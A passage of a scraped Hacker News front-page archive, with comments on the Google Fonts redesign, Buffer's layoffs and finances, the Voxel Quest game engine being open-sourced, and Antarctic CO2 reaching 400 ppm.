First one always comes up in search results, and is nothing but a link to real page. What gives? This is terrible user experience, if I search for Google fonts, there shouldn't be multiple pages for same font.

36
huntleydavis 3 days ago 0 replies      
Very impressive performance loading considering the number of fonts. Curious if they are just loading an incredibly stripped down version of each font for the preview and then lazy loading in the full font if you click to edit the text. Either way thumbs up.
37
keyle 2 days ago 0 replies      
It's definitely an upgrade compared to the old version, but the fact that it needs a "Try typing directly into the... " hint shows the shortcoming of their UX. I didn't know what it meant, took me a few tries. I think it could be better. The hover of the fields should be more obvious that it's editable at least.
38
tacone 3 days ago 1 reply      
Still they don't offer any font+css download opportunity in the way that font squirrel does. You have to do it by hand or be stuck with their CDN. How bad.
39
twhb 3 days ago 0 replies      
To the Google Fonts dev(s) in this thread: why Angular 1, not 2? Was the previous version already using Angular 1?
40
legulere 3 days ago 0 replies      
The sliders on the right side should also work (and activate the box left to it) when the box left to it is deactivated.
41
adams_at 3 days ago 0 replies      
Long overdue and very nice! I would like to filter by OpenType features, though (e.g., serif font with oldstyle figures).
42
eyeareque 3 days ago 2 replies      
What is in it for google to give these fonts away? Does it help them track people or learn about sites that use them?
43
dpcan 3 days ago 0 replies      
I've been waiting since 1995 to have the same sort of tool built into Windows to view my installed fonts.
44
andyfleming 3 days ago 0 replies      
All these updates and still can't select a range for "thickness", "width", etc.
45
zanerino 3 days ago 0 replies      
I can't select 10 px font sizes with the slider on some fonts like "Space Mono." I can with others, and then can click the "Apply to all specimens" to update even the fonts I can't adjust with the slider control.

I'm using Firefox 47.0.

46
calewis 2 days ago 0 replies      
A "+" icon that has a hover state and an interaction, yet do different things? Good work.Nice quotes are irrelevant if you can't get the basics of user experience right.
47
gregmac 3 days ago 0 replies      
Anyone else having trouble with this? Some characters not showing up. Chrome 51 on Windows 10: https://i.imgur.com/TTNQSOA.png
48
smpetrey 3 days ago 0 replies      
A wonderful update. A useful creation that celebrates type. High-fives are in order.
49
NKCSS 3 days ago 1 reply      
I wish you could filter fonts based on writing style; take the letter a for instance; there can be so many was to represent the lowercase; to get complementary fonts; it would be nice to filter on those characteristics.
50
STRiDEX 3 days ago 0 replies      
Looks like angular 1 with angular material. Works very smoothly here. Neat.
51
Marazan 3 days ago 1 reply      
As a die hard lover of the eurostile inspired 'monofur' as my programming font Space Mono looks very, very interesting.
52
jenscow 3 days ago 0 replies      
Wow - I did not realise they had so many fonts!
53
huangc10 3 days ago 1 reply      
What's the font used on the page? It reads beautifully (especially in the "about") and I'd like to use it.
54
msoad 3 days ago 1 reply      
I thought Google Fonts has Farsi fonts as well.
55
Flimm 2 days ago 0 replies      
Being able to select a language for the sample text is very useful. Thanks Google!
56
alansmitheebk 3 days ago 0 replies      
Most of these look like shit in chrome.
57
avikalpa 3 days ago 0 replies      
Is it just me of the Google fonts page look a lot like the Microsoft Metro design?
58
neves 3 days ago 0 replies      
Why should anyone buy fonts with so many high quality ones free to use?
59
hellok 3 days ago 0 replies      
\(o_o)/Unfortunately, this page doesn't exist.
60
adrianlmm 3 days ago 0 replies      
61
honkhonkpants 3 days ago 2 replies      

 Lazy loading while I scroll makes Chrome cry.

8
Buffer Layoffs buffer.com
567 points by aarondf  1 day ago   397 comments top 53
1
compiler-guy 1 day ago 24 replies      
This may be a little cynical but:

"With our culture of bringing our whole selves to work and seeing team as family, with shared values we live by,..."

In the American business world, you are an employee until you aren't. Confusing being an employee with being "family" is a mistake, both for the company and the employee.

When times get bad, companies do what it takes to survive, including throwing employees overboard. That's just a fact.

Buffer may have thought it was different, but that flow-chart of how they decided who to layoff was entirely about how an employee can help the company, not how the layoff would affect the employee. That's not how normal families make decisions.

I have no problem with any of that, but anyone who thinks that way has another thing coming.

All of this isn't to say that Buffer was thoughtless or callous in how they handled it. From the outside, it looks like one of the better handled layoffs I've seen.

But still. Don't confuse your job with your family. It's a business relationship that is only maintained as long as it is in both side's interest to do so.

2
sulam 17 hours ago 4 replies      
Two things jumped out at me.

1) They planned to spend 1/3 of their remaining cash on flying people around the world to meet f2f. Whoah! They need a CFO with some real power, because that is absurd.

2) Speaking of needing a CFO, one of the first things a CFO will probably point out to them is that their cash target is off by 100%. They're targeting hitting 50% of today's ARR sometime next year, yet they plan to grow ARR in 12-18 months by double. If they truly want 50% ARR on hand, they need to target $10M, not $4-5M.

I also have some questions about the graph -- I'm sure it's well-meaning but it looks fishy. The slope of the curve is noticeably better in the go-forward plan vs the status-quo plan, but there's no logic to support that in the post. I imagine there's a breakdown that makes this make sense, but it's not at all obvious, and the naive conclusion is that these people who were fired were actually slowing down sales somehow. Secondly, every time I see a graph where the next month is negative and then ... magic... and the slope goes positive, my spidey sense tingles pretty damn hard. That said, there are some obvious reasons this might happen, including the cost of the layoff being recognized next month, so that's less of an obvious red flag.

3
hkmurakami 1 day ago 1 reply      
>In short, this was all caused by the fact that we grew the team too big, too fast. We thought we were being mindful about balancing the pace of our hiring with our revenue growth. We werent.

>Reflecting on it now, I see a lot of ego and pride reflected in that team size number.

> In many areas, we grew the team more than was truly necessary for the time, more than was clearly validated.

I feel like we all experience this pull by vanity metrics, ego, etc. The level of honestly we've seen in this post will hopefully serve as a reality check for many of us.

>Both Leo and I have taken a salary cut of 40% until at least the end of the year. Savings: $94,000.

>Leo and I are committing $100k each in the form of a loan at the lowest possible interest rate, with repayment only when Buffer reaches a healthy financial position. Savings: $200,000.

This is an attitude and decision I saw made by the C-level during the financial crisis at a company with hundreds of employees. The C level took home $0 in pay and the staff took at 40% until they made it back to profitability, in order to avoid laying anyone off (this is Japan where reemployment would be incredibly difficult).

It shows maturity and commitment to the organization (i.e. your people) that is rarely seen these days in startup land. Much respect.

4
danso 1 day ago 6 replies      
FWIW, here's their public spreadsheet of salaries and calculations. Not sure if it's been recently updated (on closer look, seems to reflect the founders' stated pay cuts, and new hires as recent as last month):

https://docs.google.com/spreadsheets/d/1l3bXAv8JE5RB9siMq36-...

edit: Adding links to their blog posts:

https://open.buffer.com/transparent-salaries/

https://open.buffer.com/introducing-open-salaries-at-buffer-...

5
rwhitman 1 day ago 0 replies      
As much as I want to dive into armchair management here, I greatly respect the fact that the buffer folks remained committed to the total open transparency thing, even when it didn't paint the business in a positive light. That takes a lot of balls

In a world where business failures are rarely documented, people ought to celebrate the fact that these guys are giving the world a recorded history of the lifecycle of their company, their thoughts when making business decisions etc. There is immense value to be gained for anyone in this industry

6
ctvo 1 day ago 4 replies      
>> We canceled our upcoming team retreat to Berlin. Savings: $400,000.

Compared to all their other costs that one stood out the most. 500k savings laying off 10% of your workforce compared to 400k for a team retreat in Berlin.

Is this typical?

7
minimaxir 1 day ago 8 replies      
While Buffer's transparency is incredible, the financial calculations in the article fail to account for the possibility of an employee exodus domino effect, especially after both knowing the financial state of the company, and relevant perks being cut.
8
hobo_mark 1 day ago 6 replies      
I certainly appreciate their openness, and like to follow their progress, but...

...could anyone explain to this naive commenter how it takes 90 (80 for that matter) people to run essentially a 'cronjob as a service' business?

9
odbol_ 10 hours ago 0 replies      
What is with capitalism's obsession with constant growth? Buffer is a great app, I use it every day, but how in the f*ck do they need 100 employees to maintain it?

My company is writing an entire smartwatch OS, including companion apps for iOS and Android, and we're less than 10 people. Buffer needs 100 people just to write one multiplatform app? What is going on here?

10
eropple 1 day ago 0 replies      
> Reflecting on it now, I see a lot of ego and pride reflected in that team size number.

This is one of the worse diseases I see in the tech world. I have friends who, when asked how their company is doing, respond with something like "great! We just hired a dozen more engineers."

I'm pretty sure a better answer is "great! We just got X customers," or "great! We're profitable now!". Not how big your fief is. (But, mentioning fiefs, I'm struck by the notion that a startup is just a business unit of a loosely-organized corporation and CxOs thereof just middle managers for an investor-class executive group.)

11
k-mcgrady 1 day ago 3 replies      
I'm curious as to why they had 94 employees. That seems like an insanely high number for a company that does something pretty basic (not dumping on the product, I like it and have used it in the past). What are all of those people doing?
12
joosters 1 day ago 1 reply      
"We had just come out of a long experiment with self-management, where we fully leaned in to ..."

What on earth does 'fully leaned in' mean? It's not the greatest of metaphors, I pictured someone falling on their face.

13
AndrewKemendo 1 day ago 0 replies      
They laid of 10 people, 11% of their workforce - which means they had ~90 employees.

Crunchbase tells me they have had almost 4M in investment since 2011 and Baremetrics puts them at 45M in lifetime revenues. So, call it a round $50M in capital.

50M/90 employees all in is around $135k/employee each year for the last two years. Subtract all the perks and those numbers get hard fast.

Just goes to show that, even with a lot of cash, a lot of people cost a lot. It ends up doing a disservice to each existing employee, with each new person your company brings on, if you can't scale revenue with the pace of hiring.

14
freestockoption 9 hours ago 0 replies      
"We had just come out of a long experiment with self-management"

Why do startups do these huge management experiments? My company did the flat thing too and they spent a few months trying to get people to understand it. Probably burning up 5hr/wk for each person. Until they almost ran out of money. By then people were really confused. I think it almost killed the company due to the politics and red tape it created (strange, it was supposed to eliminate it).

My opinion is that it's hard enough to run a startup, let alone trying to invent a new management methodology. Best to go with what people already know. It may not be perfect, but at least there's some prior experience with it.

Just like how most would advise using the programming language and platform you know to build your initial product, rather than trying to to learn something that you think might be better.

15
pascalxus 10 hours ago 1 reply      
It sounds like they handled this layoff both compassionately and professionally, although the founders have a lot to learn about balancing their spending.

But still, every company and employee needs to recognize that your coworkers and company are not your family - this only leads to misplaced expectations.

One of things that makes America so competitive, is the concept of at will employment - the company can fire or lay you off anytime and you can leave at any time too. This is a reality we must accept for capitalism to work at optimum efficiency. I realize this may seem heartless and cruel, but that's why you need to have work/life balance. Ideally work should not account for more than 10 to 20 hours of your life per week. Sadly, for most of us it's 40+ hours. It is outside of "work", where you can form relationships that mirror a family like structure - in volunteer groups (unpaid), friendship circles, hobby groups, book clubs, etc. More of our lives should be dedicated to such organizations for us to remain better balanced.

16
ryanmarsh 1 day ago 0 replies      
Company lays off 10,000 people: "restructuring"

This guy lays off 10: heart felt apologies and deep moment of reflection

Criticize away HN, while he still has his humanity.

17
byset 1 day ago 0 replies      
I guess I'm nitpicking, and the guy probably just needs an editor, but the whole tone of this post seemed tiresomely self-congratulatory to me. "Look at how frank and empathetic and open I am! Look at me ruthlessly dissect my own mistakes! Isn't that refreshing?"

It also all seems a bit maudlin being laid off is a terrible thing, but mistakes happen and employees are aware of risks going in (although as others have noted, this type of situation underscores how inappropriate the whole "we're a big family" idea is). It would seem more respectful to the laid-off employees not to go on and on in this manner.

18
selectron 1 day ago 0 replies      
Good for them for being transparent even when the company is struggling, but if I was an employee at the company I would be worried. The chart they provide of Buffer bank balance over time seems overly optimistic. It looks like they assume that the employees they fire added no value to the company - they assume the company will generate the same revenue even after cutting 10% of their employees. This is wrong, and would worry me greatly that the founders don't seem to recognize this. Of course I would be worried anyway because laying people off at a start-up is a really bad sign, anyway you try to spin it.
19
pbreit 1 day ago 1 reply      
I have mixed emotions with Buffer's shtick. On the one hand there's something fresh and unique about it. On the other, I think: just put your heads down and get to work serving customers!

I'm guessing the main benefit of the open-ness is marketing. I doubt it helps the company much beyond that.

20
nickgrosvenor 1 day ago 0 replies      
Damn, only Buffer could exploit the firing of 10 percent of their staff with a promotional post.

I don't know whether to be impressed or offended.

21
nodesocket 1 day ago 0 replies      
This is a bit surprising. Buffers revenue has been solidly growing (up 23% in the last 6 months) with around 840K in MRR. I suppose having that many employees adds up quickly though. It's hard letting people go... But ultimately you have to do what is required to keep the company going.

Source of financials:http://i.imgur.com/i3W5KC7.png

22
smuss77 1 day ago 1 reply      
I really like the transparency and accountability.

Two questions: Why are the two loans necessary? And, how does a loan get counted as savings?

> Leo and I are committing $100k each in the form of a loan at the lowest possible interest rate, with repayment only when Buffer reaches a healthy financial position. Savings: $200,000.

23
pc86 17 hours ago 0 replies      
From a tweet cited in the article (not the author):

> i think @dfjjosh's rule of 50% of ARR to operate and invest without $$$ stress is a really good one. use debt to hack it.

What's the point of taking on debt just to have more cash on hand? Is this a startup-y "growth ber alles" type of mentality or is it found in the larger business world as well? I don't see how increasing your burn rate just to have more cash in the bank is a good business decision, especially when you'll pay a premium to have that cash in the form of interest or loan origination.

24
beat 1 day ago 0 replies      
This reminds me of Ben Horowitz' The Hard Thing About Hard Things, where he talked about implementing a plan to lay off 90% of his company in complete secrecy, for fear of employee exodus and loss of customer confidence. But that was a very different situation than Buffer is in now, as it happened during the original dot-com era collapse.

Kudos to Buffer for their approach to transparency. I think it will actually serve them well here.

25
OoTheNigerian 1 day ago 0 replies      
I appreciate the forthrightness in this blogpost. Not only have they owned up to mistakes, the thought process in dealing with it (whether you agree with it or not or not) is well documented.

To be transparent is quite a difficult thing. You expose yourself to so much scrutiny.

Godspeed Joel as you and your team bounce back from this slight setback. We all fall. how we get up is what matters.

26
jimbokun 14 hours ago 1 reply      
On deciding to not raise funds from venture capitalists:

"This has some implications on the true growth rate we can expect, yet it has significant benefits we feel in terms of the freedom we have to experiment not only with innovation in products but also in the way we work."

I think this reflects an important, often over looked point. Many people want to start a business because they prefer to not have a boss, and be able to make their own decisions.

In many ways, raising capital from outsiders can just replace one boss with another. Now you have to make your investors happy, even when it leads to different decisions than what you might make otherwise.

27
AznHisoka 1 day ago 0 replies      
we always talk about 3rd party platform risk for startups and to me Buffer is the prototypical example of one. If Twitter has a bad day they can cut off their API access and they'd be dead (ok they support Facebook and others but that's still 1/2 of your core)

So it seemed quite absurd they'd spend so much on things like retreats when they have so much risk.

28
alexbrower 1 day ago 0 replies      
"Although I know rationally that the size of the team is not something to celebrate, I feel that I slipped into that harmful mindset quite a bit over the last year. Not everyone is familiar with growth metrics like monthly recurring revenue, but team size is easy to understand. Sometimes it impressed people when I told them how big the company was, and I was proud to share it."

Correct. Headcount is a figure that represents a company's means. If you're tracking it as an end result, you end up having to make hard decisions or someone makes them for you.

The transparency is commendable. A couple other observations:

- Affected employees had an average salary of $58.5k (assuming your metrics is net of benefits and payroll tax). If this is annualized, it appears you let go of non-engineers. Set goals and performance expectations for those who remain, especially those who build your product.

- Stop publicly promising salary increases altogether. Promote people based on their ability, not an artificial loyalty policy. Some people deserve 10%+ raises, some you'll find are overpaid. Use a basic job ladder and put the burden on managers to justify comp changes.

- If the policy of granting vacation bonuses was for recruiting purposes, you've successfully attracted people who want to be paid not to work. Again, implement a corporate bonus program and set goals for staff.

Best of luck.

29
jmcgough 1 day ago 0 replies      
Appreciate the transparency, but they mention that they let people off on a "last in, first out" basis, and their flowchart seems to suggest that if they like an employee they'll move them to another role.

I don't blame them for doing housekeeping in that way - if you need to reduce headcount, start with people who don't fit the culture and business needs - but they shouldn't pretend that it's perfectly unbiased.

30
galistoca 1 day ago 0 replies      
People keep saying "admire the transparency", "appreciate the transparency", but really what's the point? Who is the "transparency" for?

I really couldn't care less about my salary being made public to the world, all I care about is working on something I believe in.

Extreme transparency has nothing to do with their business growth and it will probably come back to haunt them later, I don't know why they're going so far as to do all this.

Doing business is extremely hard on its own, why complicate matters and expose private details to the public, which can and probably will at some point be used against you? I mean even on this thread people nitpick and gossip about every single details. And it would be a lie to say they care 0% about these things. If they do care, it just means less time worrying about their core business.

31
kra34 6 hours ago 0 replies      
"when we had to tell 10 talented teammates that their journey with us was over" - Gavin Belson
32
kumarski 1 day ago 0 replies      
They have some pretty tough competition now.

https://www.socialchamp.io/ for example is one that is growing rapidly.

I can only imagine that it may become a commodotized space w/ little differentiation.

33
chx 1 day ago 2 replies      
Why is this several hundred upvotes news? A startup grows from 30-something to 90-something it's too much it trims a little. That's entirely normal. What's the big news?
34
OliverJones 1 day ago 1 reply      
> Leo and I are committing $100k each in the form of a loan at the lowest possible interest rate, with repayment only when Buffer reaches a healthy financial position. Savings: $200,000.

Oops. This isn't savings. It's high-priority debt. Investors really want to invest in the future of the company, not the past. If these guys want to serve their company, they'll

(a) write this off their personal books, considering it an unrecoverable cost.

(b) convert it from debt to some kind of warrant giving them the right to recover it from profits at some point in the future.

Who's advising these guys?

35
WWKong 1 day ago 0 replies      
"... seeing team as family, with shared values..."

Should have tried pay cut across the board and see if folks jumped ship. A good test to see if that culture held up.

(Just a thought. I know it is more nuanced)

36
Yabood 1 day ago 0 replies      
It boggles my mind why a company like buffer that has a relatively simple product and a pretty straight forward transactional sales model would ever need that many people.
37
tdaltonc 12 hours ago 0 replies      
Have they written about their experience with Holacracy?
38
mattfrommars 20 hours ago 0 replies      
Interesting as just yesterday I was praising the company how successful it is in this niche. It was posted on a thread yesterday which went like 'Successful companies which YC rejected".

And here the layoffs. The upper management were banking 250,000 the last time I read their details.

39
ovrdrv3 1 day ago 3 replies      
What does buffer do as a company?
40
adwf 1 day ago 0 replies      
Ouch. Never a pleasant thing to do.

I just hope they made the cut deep enough. A common mistake is to cut enough to just get back to break even, when what you really need in that situation is to get back to a decent level of profitability. The number of times I've seen a second round of layoffs because people got that wrong...

From the looks of their projections, they've done the right thing, back to profitability and growth.

41
OJFord 20 hours ago 0 replies      
I realise it's a significant (11%) proportion of their (former) staff - but "we've made 10 layoffs" sounds incredibly personal.
42
dmitrygr 1 day ago 3 replies      
"We made 10 layoffs in order to recover to a healthier financial position. Savings: $585,000"

so these people cost the company $58,500 apiece (this is incl. their benefits, insurance, etc). Meaning their salaries were, what? $40k?

wow?

43
Fiahil 1 day ago 0 replies      
Are we seeing these event more frequently than before or is it just a matter of perception?

Anyway, despite being a tough time for them; it's good to know they live in reality and not in a "unicorn-themed-chase-party".

44
hathym 16 hours ago 1 reply      
22% of their stuff are happiness heroes [0] !!! WTF !!!!!!

[0] https://docs.google.com/spreadsheets/d/1l3bXAv8JE5RB9siMq36-...

45
cpg 1 day ago 0 replies      
Buffer overflow. Oops!
46
rigotovar 12 hours ago 1 reply      
I'm sorry if I haven't read all the comments, but this post basically tells me that the company should remove both founders and have a real CEO to do the right decisions from the beginning of the growing, 34 to 94 it's 3 times the size and having retreats and perks like those mentioned are not worth it specially for such a small/young companies
47
sinzone 1 day ago 0 replies      
Leadership has to stay under one roof. Team can be distributed but the leadership not. Everyone in the mother tipi.
48
markbao 1 day ago 0 replies      
For a revenue-generating business like this, is 90 employees with $10M ARR normal?

Admire the transparency.

49
the_watcher 1 day ago 0 replies      
The comments so far all seem focused on the language Joel uses (family, etc). While that may be fair, if you simply change those terms into whatever you think is more accurate, this is a very, very good piece of insight into the perils of growing too quickly, as well as an (as usual) extremely transparent look into how a company that is reasonably successful adapts.
50
zump 22 hours ago 0 replies      
What does this company even do?!
51
reality_czech 1 day ago 0 replies      
In Silicon Valley, Buffer overflows you!
52
alphacome 1 day ago 0 replies      
Layoff is : to get rid of someone as soon as he has finished his work
53
GBond 1 day ago 1 reply      
OT: I stopped using Buffer since they've imposed limits on the free accounts. Any suggestions for alternatives?
9
Another Update voxelquest.com
602 points by shawndumas  3 days ago   113 comments top 28
1
danso 3 days ago 2 replies      
It's rare to see a Kickstarter project essential "fail" in delivering the original product but to have so many backers feeling satisfied [1]...it's a testament to the creator's consistently thorough and engaging updates that backers were happy to just be on the journey, even if they didn't get the game they promised. Also, it appears that the estimated delivery was Jan. 2017...there's probably a positive psychological component to being honest early rather than dragging people through a long period of denial and delay before going radio silent.

[1] https://www.kickstarter.com/projects/gavan/voxel-quest/posts...

2
phantom_oracle 2 days ago 1 reply      
When you see people say things like:

"I backed you, not the product, keep the money!"

OR

"Open Sourcing it is worth more than I ever backed for this project, refund not needed"

AND (the best of them all - the way the internet does compliments):

"I will spend however much time is required to hunt you down in person and forcefully give you the money back if you dare refund me."

You're reminded of how little the things we own or build matter compared to the bonds we develop.

Maybe 10 years from now, through a community-led project, your game (with you as 1 of the leaders of the project) becomes a reality.

The game then takes off and is played by the same community who built it. You end up making about 90 good friends who you game/hack/build the game with and become a small internet celebrity to niche-gamers.

Although this story is not on the "high-tech, Docker-swarm-graphDB-containerManager-C++killer-version0.0.1234.44444" level, seeing a story like this reminds us of our humanity, even as people who rot away behind screens all day :)

3
shazow 3 days ago 1 reply      
As a Kickstarter backer, MIT licensed code very much exceeds my expectations. Thank you!

I'd love to get a playable game out of this someday, but it doesn't have to come from you. :)

Best of luck, OpenAI is lucky to have you.

4
grownseed 3 days ago 1 reply      
Worth a shot, I know there are some people around here who don't know what to do with their money, who might be considering financing the next chat/social/... app, but I implore you to consider supporting Gavan full-time (should he actually want it of course). I absolutely would if I could, unfortunately public cancer research is not exactly a lucrative business...

Voxel Quest is a great project that deserves all the attention it can get. It might not be the next unicorn, hell, it might not even produce any ROI, but as I see it, it has the potential to have a great impact. See it as a goodwill project if you will, a chance to make a nice dent in the gaming landscape and more.

It's not often that I feel this way, but some things just deserve to exist and be worked on for their own sake. Voxel Quest is one of these things, and Gavan is the one who can make it happen.

5
Volundr 3 days ago 1 reply      
If I'd known the end result of this would be an open source game engine, I'd have given you more money. Take it! Keep it!
6
qopp 3 days ago 1 reply      
I'm happy that Gavan is Open Sourcing his work and that people are generally happy with the outcome.

That being said I would not be surprised if Gavan announced a brand new voxel project and kickstarter a few years from now, starting from scratch like last time.

Previous discussion: https://news.ycombinator.com/item?id=7491456

7
zubspace 2 days ago 2 replies      
Is there something you would do differently, if you could go back in time?

Like many developers around here I got into programming through game development. Back in the days I started working on my own game engine and put a lot of effort into it without going anywhere. About 8 years I spent working on it on and off and learned a ton of C++. I believe, it was time well spent, but sometimes I get the nagging doubt that I should have spent my time more wisely.

Times change. Family, 2 kids, a house. I had to optimize my way of spending time. In the late hours I got left I started dabbling into other engines and frameworks for 3D games: Three.js, Dart, Haxe (Flambe, HaxeFlixel, HaxePunk) and now finally settled on Unity.

If I could go back in time I would tell my former self: "Stop wasting time doing everything from the ground up. Start making games!" I believe many aspiring game developers fall into the trap of doing everything by themselves. They start building frameworks and stuff just for the sake of it and forget, that making games requires a more widespread skill set (Game Design, Concept Art, Modelling, Texturing, Marketing, etc..)

Your engine is a work of art. I love the approach you've taken. But from the start I always thought, that you should start working on a game as soon as possible. What's your opinion on this?

8
aavotins 2 days ago 1 reply      
I just discovered this, took my time to get acquainted with the whole situation and I must say that I'm amazed!

You did a really great job, don't be too hard on yourself. As a developer I always value tools over a product, and you went that extra mile to give the community a tool, instead of giving them a game. I think you deserve every penny, great job!

9
kvark 3 days ago 1 reply      
Jumping on OpenAI must be exciting! No matter how hard you try pushing the voxel rendering tech forward, the same effort invested in the AI has a much bigger potential. I hope you do well and enjoy it ;)
10
jsd1982 3 days ago 1 reply      
I would say that when you get asked about the project in interviews or casual conversation, don't sum it up as a failure of any sorts. Speak about it as a success in research because that's what it really is. Basically, don't downplay your accomplishments due to one metric of success/failure such as Kickstarter or Patreon cancelation.
11
lemiffe 3 days ago 1 reply      
The amount of positivity in this thread makes me believe in humanity again :) (coming from someone battling with depression)
12
willismichael 3 days ago 0 replies      
I would love love love to see a number of indie game studios pick up the open source engine and do crazy things with it that even Gavan didn't imagine. I'm so excited for the potential in this.
13
thedaemon 3 days ago 1 reply      
Sorry to see you go. But I'm proud that you are going out the proper way by releasing source code. Having amazing projects like this die and never see the light of day is very sad and happens too often for my liking.
14
kriro 2 days ago 1 reply      
It wasn't your intend but to me this project and it's conclusion that is happening right now kind of proves my base assumption that crowdfunding of creative endeavors is a very good idea if the circumstances are right. My hypothesis has always been that there will be people willing to pay other people to do stuff that is interesting and that one of the major motivators is to make sure those people can work on said stuff.In essence I feel it's more important to communicate that the money is meant to keep the creative process running and not for specifics products. I will pay X$ so that artist Y can keep doing what they do but probably won't pay Z$ to buy a product from that artist if that makes sense.

I feel like the reaction you are getting indicates that hypothesis isn't horrible. Thanks for that :)

15
nickpeterson 3 days ago 1 reply      
I haven't followed this project, and know very little about rendering, but I saw in your updates you ended up moving the voxel generation off the GPU and onto the CPU. How feasible would rendering on the CPU be for your engine? Is it highly specialized towards using GPU features, or could it be reasonably distributed across multiple traditional CPU cores?
16
iaw 3 days ago 1 reply      
I look forward to every update on Voxel Quest. I find the entire project breathtaking and beautiful. Even if I never personally play it, I am grateful that it exists.
17
Paul_S 3 days ago 0 replies      
You couldn't have handled this situation any more gracefully. I hope your engine finds a game... or a game finds your engine.
18
BatFastard 3 days ago 1 reply      
Good work on VQ!I can totally relate to what you went thru, since I went thru exactly the same thing myself 6 months ago.Glad to see you are open sourcing it, might have legs still, though nothing can compare to the passion of a founder.
19
gabrielcsapo 3 days ago 1 reply      
amazing work on Voxel Quest, I have been following this since the start and it made me want to carry that same engineering excellence in my open source projects!
20
MustardTiger 3 days ago 1 reply      
It is really nice to see someone in the game industry with honesty and integrity. But at the same time, it makes me sad that it stands out as being so incredibly rare.
21
stcredzero 3 days ago 1 reply      
Your game website looks great! What's it implemented on?
22
gldev 3 days ago 1 reply      
This is incredible, looking forward for the release of the engine, what is it that you'd be doing with openAI?

(:

23
dreamling 2 days ago 1 reply      
Can anyone be more even-keeled or humble than Gavan?

You impress me, sir. keep the patreon around for people who just want to support a seriously good person who makes fun stuff from time to time.

24
stephengillie 2 days ago 2 replies      
Wow! In 2016, to have a successful Kickstarter, you don't even need to deliver anything; you just have to be charismatic and write interesting updates for people to want to give you money.
25
ebbv 3 days ago 2 replies      
Good on you for being honest all along and for open sourcing the results and offering refund.

I wish people (both people seeking funding and backers) would take more realistic and honest approaches towards crowdfunding.

26
mrfusion 3 days ago 1 reply      
Would voxel quest work in the vive?
27
googletazer 3 days ago 1 reply      
Never knew about this project, the water and water physics looks beautiful. Hope this ends up in good hands.
28
ironrabbit 3 days ago 1 reply      
May I ask what you'll be working on at OpenAI? (congrats, btw!)
10
Antarctic CO2 Hit 400 PPM for First Time in 4M Years scientificamerican.com
422 points by splawn  1 day ago   299 comments top 27
1
blondie9x 15 hours ago 4 replies      
We all know by now CO2 and CH4 leads to a warmer planet. We also know what's driving greenhouse gas levels to rise across Earth. Contributors are deforestation, intensive animal farming, and primarily the combustion of carbon fossil fuels like coal, tar sands, oil, natural gas etc. But here is the underlying problem, despite us knowing how bad things are, (97+% of scientists who study this field agree we are causing the planet's climate to shift away from the temperate climate we thrived in) not enough is being done at present to truly solve the problem.

What really is disheartening and what no one in the media and government is talking about is how in 2015 CO2 levels rose by the largest amount in human recorded history. 3.05 PPM

http://www.esrl.noaa.gov/gmd/ccgg/trends/gr.html

We are being lied to and mislead by our governments that uniform actions are being performed to save the planet for the future of man. Vested interests in the fossil fuel industry continue to drive climate change. Yes, solar energy is starting to become incredibly efficient but not enough of it is coming online in proportion to fossil fuel burning that persists and is also installed annually. If we do not rally against it, our ability to live on this planet is at stake. The lives of our posterity are also at risk because of the burning. It will not be until we take extreme actions not on a country level but as humanity together that we will slow the burning and save ourselves.

What are these actions you might ask that will actually be effective? These can range from banning fossil fuels entirely, global carbon pricing system, banning deforestation, changing human diets, extreme uniform investment in renewable energy and potentially fourth generation nuclear reactors, more funding for developing nations to install alternative energy sources, and to shift the transportation grid towards sustainability.

2
wallace_f 22 hours ago 5 replies      
Sometimes I feel I am the only one sceptical of the politics and alarmism surrounding climate change. I am Not saying I'm skeptical that it is real (or to be more appropriately scientific, that the evidence suggests the observed increase in CO2 and temperature most likely is caused by emissions), but I'm saying the politics are more complex than that.

I can think of a number of other issues that pose similar if not more immediate, or greater risks to humanity that have lower economic costs to solve.

Global warming activism also bothers me in some ways. Snobs have an absolute affinity for it, and it seems in this cause it's easy to create an aura of good will without actually having to follow-up and do anything tangible to benefit other people. Think: Buying hybrid cars that pollute more than my simple Honda. Preaching about the importance of action on this topic is also rather convenient: you don't appear to actually have to take any action. Preach about the problems of homelessness, drug abuse, crime, healthcare? There are obvious ways to actually spend your time helping people who are victims there. Want to hold the moral superiority card with as little effort as possible? It's super convenient.

There's also the the west's party line to the rest of the world: We can afford clean energy now, and of course we want it; but even though other nations can't afford it, they're now declared immoral for not embracing it.

None of what I'm saying is that global warming isn't a worthy cause, just that the enormity and alarmism of the politics that surrounds it is cause for question.

3
jakeogh 1 day ago 4 replies      
4
curiousgeorgio 1 day ago 2 replies      
Go ahead and call me all the usual names (I don't care), but I'm a skeptic of a few things - especially things like science that has strong political influences/biases/implications - and yes, sometimes even mainstream science.

But no, I don't deny or ignore the apparent trends. That's why I also don't feel (as others have expressed here) any sense of grave alarmism or fear about the effects of warming. When climate-related deaths have steadily decreased in recent history[1], shouldn't we really be more concerned with adapting (or continuing to adapt) our own environments to deal with the earth's climate? That doesn't mean we shouldn't be environmentally conscious; just the opposite. We should be conscious of our environment, both in terms of what nature provides and in terms of how we adapt to it. Surely, very few people alive today would be suited to living in many populous places in the world without the protections afforded by human invention - today or pre-industrialization. Technological progress (much of which is a product of fossil fuels) has enabled us to live significantly longer lives, and fewer people are in climate-related danger now than ever before in history. In my view, that's a good thing.

[1] http://www.cato.org/sites/cato.org/files/wp-content/uploads/...

5
FuNe 16 hours ago 1 reply      
Let it roll.

Few in the industrialized world if anyone really gives a shite (1). Lots of well-fed educated westerners would lose sleep if "free" economy is coughing but don't really care about this. Run away capitalism creating the problem in the first place is also -ehm- the reason why mostly leftists seem to get it. Not that this helps. It just makes the whole thing even more partizan.

Sad truth is the guys that are really screwed (so far and at the foreseeable future) by this are not exactly HN commentators. To them this might mean drought and death next year but to us -fat cats- this apparently means a danger to economic development. We simply do not have our asses on the line (yet) - which is why we can talk this to death but do _nothing_ to really prevent it. We might wake up when we start losing relatives due to 50C heat waves. Who knows.

And even then, if we get it, who would actually do something? We -at a global scale- have been terrible at resolving much simpler crises. Want an example? Ebola virus was stopped last minute. Zika virus is on the loose and is gonna get worse (because Olympic games will go on at the epicenter despite hundreds academics calling for delaying them). If nobody makes money out of it nobody cares. Our whole system is simply dancing to that music.

So - let it roll babe.

1. <brutally honest mode on> Including my fat ass. </brutally honest mode>

6
lossolo 1 day ago 5 replies      
The worst thing is that we can't stop it when it will be too late. This doesn't work like a switch. Even if we would drastically cut all CO2 emission those levels would not drop in our lifetimes.
7
MikeHolman 1 day ago 19 replies      
